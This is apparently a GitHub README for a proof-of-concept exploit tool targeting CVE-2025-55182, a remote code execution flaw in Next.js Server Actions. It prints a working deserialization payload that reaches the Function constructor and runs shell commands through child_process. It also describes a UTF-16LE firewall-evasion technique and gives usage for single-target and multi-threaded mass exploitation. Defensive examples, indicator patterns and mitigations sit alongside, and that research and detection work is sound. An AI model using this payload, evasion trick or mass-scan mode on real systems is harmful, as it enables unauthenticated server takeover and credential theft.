ceh-aditya-raj/CVE-2025-55182


🚨 NextRce — CVE-2025-55182 (Next.js / React Server Components RCE)

NextRce is a security research tool demonstrating CVE-2025-55182, a critical vulnerability in Next.js App Router applications that use React Server Components (RSC) and Server Actions.

The vulnerability allows an unauthenticated attacker to achieve Remote Code Execution (RCE) by abusing how the server deserializes the RSC payload carried in a Server Action request and resolves the references inside it.


🛠 Vulnerability Overview

CVE-2025-55182 sits in the server-side React Server Components (Flight) deserializer that the Next.js App Router uses for Server Actions. It is best described as a server-side object injection / prototype chain abuse issue (unsafe deserialization) reachable through the multipart/form-data body of a Server Action request.

When a Server Action is triggered, the server trusts and deserializes the structured client input without checking where the references inside it point. With a specially crafted payload, an attacker can steer that internal resolution logic to the Function constructor and execute arbitrary system commands in the Node.js runtime, with no authentication.


📌 Root Cause

The vulnerability arises from the following combined factors:

  • Server Actions Trust Model
    Server Actions accept structured client payloads that are processed through the internal React Server Component resolution logic with insufficient validation; the server cannot tell attacker-supplied reference strings from its own.

  • Object Injection During RSC Resolution
    Reference strings of the form $<id>:<property>:<property> are followed with ordinary property access, so segments such as __proto__ and constructor walk out of the deserialized data into JavaScript prototype chains and constructor references, reaching objects the payload was never meant to touch.

  • Insufficient Sanitization
    Internal fields such as then, _response, and the form-data getter are not protected against being supplied, or overridden, by the client.

  • Encoding-Based WAF Bypass
    Many Web Application Firewalls only normalise UTF-8 or standard JSON before matching. A payload encoded as UTF-16LE with a matching charset declaration is not matched by those rules, while the Next.js server still decodes the body and processes it as usual.


🔬 Payload Analysis

The exploit relies on injecting a crafted RSC payload inside a multipart request.
A simplified version of the payload is shown below:

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('{cmd}').toString('base64'); throw Object.assign(new Error('x'),{digest: res});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

🧠 Exploit Breakdown

1. Prototype Chain Hijack

  • "then": "$1:__proto__:then"
  • The $ prefix marks an RSC reference: start at chunk 1 and walk the path __proto__, then then. The injected object thereby acquires a then method borrowed from the deserializer's own chunk prototype, so the server treats it as a pending chunk (a thenable) and runs its Promise-resolution logic on attacker-controlled fields instead of on a genuine chunk.

2. Constructor Escape

  • "_formData": { "get": "$1:constructor:constructor" }
  • Any object's constructor property leads to its class, and a class's constructor is the global Function constructor. The deserializer calls _formData.get() to fetch chunk data, so this reference swaps that getter for Function and the string in _prefix is compiled as JavaScript instead of being read as data. There is no sandbox to escape: the code runs directly in the server's Node.js context.

3. Remote Code Execution

  • process.mainModule.require('child_process').execSync('{cmd}')
  • Reaches Node.js built-in modules from the compiled code
  • Executes the operating system command synchronously and captures its output
  • Runs with the same privileges as the Next.js server process
  • Caveat: process.mainModule is only set when the server entry point is loaded as CommonJS. On a runtime started from an ES module it is undefined and this PoC's command stage fails, which says nothing about whether the deserializer itself has been patched.

4. Digest-Based Output Exfiltration

  • throw Object.assign(new Error('x'), { digest: res });
  • In production, Next.js redacts server error messages before returning them to the client, but it forwards the error's digest property, which is meant to carry an opaque error identifier.
  • By putting the Base64-encoded command output into digest, the attacker makes the server return the execution result in the HTTP response to the same request; no out-of-band channel is needed.

5. WAF Bypass (UTF-16LE)

  • The payload can be encoded as UTF-16LE and sent with:
  • Content-Type: text/plain; charset=utf-16le
  • Many WAF engines do not decode UTF-16LE before applying their rules, so the indicator strings never appear in the bytes they inspect, while the Next.js server still decodes and processes the payload correctly. Rules that only look for UTF-8 or JSON-shaped bodies are blind to this variant.
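To make steps 1 and 2 concrete, here is an added example written for this README; it is not code from the NextRce repository or from React/Next.js. It is a deliberately small model of a reference resolver that follows $<id>:<prop>:<prop> paths, in an unchecked form beside a hardened one, run over the two reference strings from the payload above. The Chunk class, the chunk table and the rejection policy are assumptions for illustration, not upstream code or the upstream fix.

```javascript
// Added example, not code from the NextRce repository or from React/Next.js:
// a small model of a Flight-style reference resolver, unchecked and hardened,
// run over the two reference strings the page's payload uses.

// Stand-in for a deserialized chunk (assumed shape). Real chunks are thenables,
// so a prototype method named `then` exists for the "__proto__:then" walk to find.
class Chunk {
  constructor(value) { this.value = value; }
  then(onFulfilled) { return onFulfilled(this.value); }
}

// Constructed chunk table: field "1" of the multipart body, already decoded.
const chunks = { 1: new Chunk({ name: 'demo' }) };

function splitRef(ref) {
  // "$1:constructor:constructor" -> id "1", path ["constructor", "constructor"]
  const [id, ...path] = ref.slice(1).split(':');
  return { id, path };
}

// Unchecked resolver: plain property access on every segment, so inherited
// properties (__proto__, constructor) are as reachable as the chunk's own data.
function resolveUnsafe(ref, table = chunks) {
  if (typeof ref !== 'string' || ref[0] !== '$') return ref;
  const { id, path } = splitRef(ref);
  let cur = table[id];
  for (const key of path) cur = cur[key];
  return cur;
}

// Hardened resolver (an assumed policy, not the upstream fix): refuse the
// prototype escape hatches and only traverse own properties of plain data.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);

function resolveSafe(ref, table = chunks) {
  if (typeof ref !== 'string' || ref[0] !== '$') return ref;
  const { id, path } = splitRef(ref);
  if (!hasOwn(table, id)) throw new Error('unknown chunk ' + id);
  let cur = table[id];
  for (const key of path) {
    if (FORBIDDEN.has(key) || cur === null || typeof cur !== 'object' || !hasOwn(cur, key)) {
      throw new Error('rejected reference path: ' + ref);
    }
    cur = cur[key];
  }
  return cur;
}

// What the unchecked resolver hands back for the page's references. Once it
// returns Function, any attacker-controlled string (the page's `_prefix`) can be
// compiled and run; a harmless body stands in for the child_process call here.
function unsafeOutcome() {
  const borrowedThen = resolveUnsafe('$1:__proto__:then');
  const ctor = resolveUnsafe('$1:constructor:constructor');
  const executed = ctor === Function ? ctor('return 6 * 7')() : undefined;
  return {
    thenIsChunkMethod: borrowedThen === Chunk.prototype.then,
    reachesFunction: ctor === Function,
    executed,
  };
}

// The hardened resolver still serves legitimate data paths but rejects every
// reference that leaves the chunk's own properties.
function safeOutcome() {
  const rejected = [];
  for (const ref of ['$1:__proto__:then', '$1:constructor:constructor', '$1:then']) {
    try { resolveSafe(ref); } catch (e) { rejected.push(ref); }
  }
  return { rejected, legitimate: resolveSafe('$1:value:name') };
}

console.log(unsafeOutcome(), safeOutcome());
```

Run it with node: the unchecked resolver returns Function for $1:constructor:constructor and the chunk prototype's then for $1:__proto__:then, while the hardened one rejects all three escape paths and still resolves $1:value:name. The real remedy is the patched release; this model only shows why an ownership and key check on every path segment is the dividing line.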

💥 Impact

Successful exploitation of CVE-2025-55182 may result in:

  • 🔥 Full Remote Code Execution

  • 🗄️ Access to sensitive data and credentials

  • 🔗 Lateral movement within infrastructure

  • 📦 Supply-chain compromise

  • 🚨 Complete server takeover

  • Severity: Critical

  • Authentication Required: No

🛡 Mitigation

To protect against CVE-2025-55182:

  • Upgrade Next.js to a patched version immediately. The fix lives in the React Server Components packages that Next.js bundles, so applications running those packages outside Next.js must update React as well.
  • Remove Server Actions that are not needed; every action is a reachable entry point for this payload.
  • Enforce strict validation of multipart/form-data requests
  • Add WAF rules that normalise the body to the declared charset (including UTF-16LE) before matching, rather than rules that only inspect UTF-8 or JSON
  • Monitor abnormal Next-Action headers and request patterns, and treat server errors whose digest carries Base64-looking data as a signal worth investigating
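The last two mitigations call for inspection that sees the body the way the server does. The following is an added example for this README, not part of the NextRce tool: a small request inspector that decodes the body using the declared charset (falling back to a UTF-16LE heuristic for mislabelled bodies) before matching indicator strings taken from the payload above, with a naive byte-level scanner beside it that shows why the UTF-16LE variant slips past. The indicator list, header names and sample requests are constructed for the example.

```javascript
// Added example, not part of the NextRce repository: a request-body inspector
// of the kind a WAF or log pipeline needs in order to see a UTF-16LE encoded
// payload the way the Node.js server sees it. Indicators, sample requests and
// helper names are all constructed for this example.

// Strings that appear in the page's payload, as regexes over the decoded body.
const INDICATORS = [
  /\$\d+:__proto__:/,        // Flight-style reference walking into a prototype
  /constructor:constructor/, // path from any object to the Function constructor
  /"_formData"\s*:/,         // injected internal field from the payload
  /"_prefix"\s*:/,
  /child_process/,
];

// Charset from a Content-Type header; defaults to UTF-8 like a naive scanner.
function charsetOf(contentType) {
  const m = /charset="?([^";\s]+)"?/i.exec(contentType || '');
  return m ? m[1].toLowerCase() : 'utf-8';
}

// Cheap check for undeclared UTF-16LE: a BOM, or ASCII bytes interleaved with NULs.
function looksUtf16le(bytes) {
  if (bytes.length >= 2 && bytes[0] === 0xff && bytes[1] === 0xfe) return true;
  if (bytes.length < 8) return false;
  let highNul = 0;
  for (let i = 1; i < bytes.length; i += 2) if (bytes[i] === 0) highNul++;
  return highNul / Math.floor(bytes.length / 2) > 0.9;
}

// Decode with the declared charset, falling back to the heuristic so that a
// mislabelled body is still inspected in its real encoding.
function decodeBody(bytes, contentType) {
  let charset = charsetOf(contentType);
  if (charset === 'utf-8' && looksUtf16le(bytes)) charset = 'utf-16le';
  return { charset, text: new TextDecoder(charset).decode(bytes) };
}

function inspectRequest(req) {
  const { charset, text } = decodeBody(req.body, req.headers['content-type']);
  const hits = INDICATORS.filter((re) => re.test(text)).map((re) => re.source);
  return {
    charset,
    isServerAction: 'next-action' in req.headers, // header names lower-cased
    suspicious: hits.length > 0,
    hits,
  };
}

// The failure mode the page describes: a scanner that matches raw bytes as if
// they were ASCII sees "{\0"\0t\0h\0..." and finds nothing.
function naiveAsciiHits(bytes) {
  let text = '';
  for (const b of bytes) text += String.fromCharCode(b);
  return INDICATORS.filter((re) => re.test(text)).length;
}

// --- constructed samples (not captured traffic) ---
function toUtf16le(str) {
  const out = new Uint8Array(str.length * 2);
  for (let i = 0; i < str.length; i++) {
    const c = str.charCodeAt(i);
    out[2 * i] = c & 0xff;
    out[2 * i + 1] = c >> 8;
  }
  return out;
}

const PAYLOAD = '{"then":"$1:__proto__:then","_response":{"_formData":{"get":"$1:constructor:constructor"}}}';
const SAMPLES = {
  benign: { headers: { 'content-type': 'text/plain;charset=UTF-8', 'next-action': 'a1b2' }, body: new TextEncoder().encode('["hello"]') },
  utf8: { headers: { 'content-type': 'text/plain;charset=UTF-8', 'next-action': 'a1b2' }, body: new TextEncoder().encode(PAYLOAD) },
  utf16le: { headers: { 'content-type': 'text/plain; charset=utf-16le', 'next-action': 'a1b2' }, body: toUtf16le(PAYLOAD) },
  mislabelled: { headers: { 'content-type': 'text/plain', 'next-action': 'a1b2' }, body: toUtf16le(PAYLOAD) },
};

function scanAll() {
  const out = {};
  for (const [name, req] of Object.entries(SAMPLES)) out[name] = inspectRequest(req);
  return out;
}

console.log(scanAll(), 'naive hits on UTF-16LE body:', naiveAsciiHits(SAMPLES.utf16le.body));
```

The benign request produces no hits, the UTF-8 and UTF-16LE encodings of the same payload produce the same three hits once decoded, and the byte-level scanner scores zero on the UTF-16LE body. The heuristic matters because a charset declaration is attacker-controlled too: a body sent as plain text/plain still gets decoded as UTF-16LE when its bytes look like it.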

🚀 Usage

Single Target

  • python3 exploit.py -u https://target.com -c "whoami"

Mass Scan with WAF Bypass

  • python3 exploit.py -l urls.txt -B -t 50

⚠️ Disclaimer

  • This project is provided strictly for educational, research, and authorized security testing purposes.

  • Do NOT use this tool against systems you do not own or have explicit permission to test.

  • The author assumes no responsibility for misuse.

About

Proof-of-concept research tool for CVE-2025-55182, a critical unauthenticated RCE in Next.js App Router caused by server-side object injection in React Server Components and Server Actions, including UTF-16LE WAF evasion techniques.
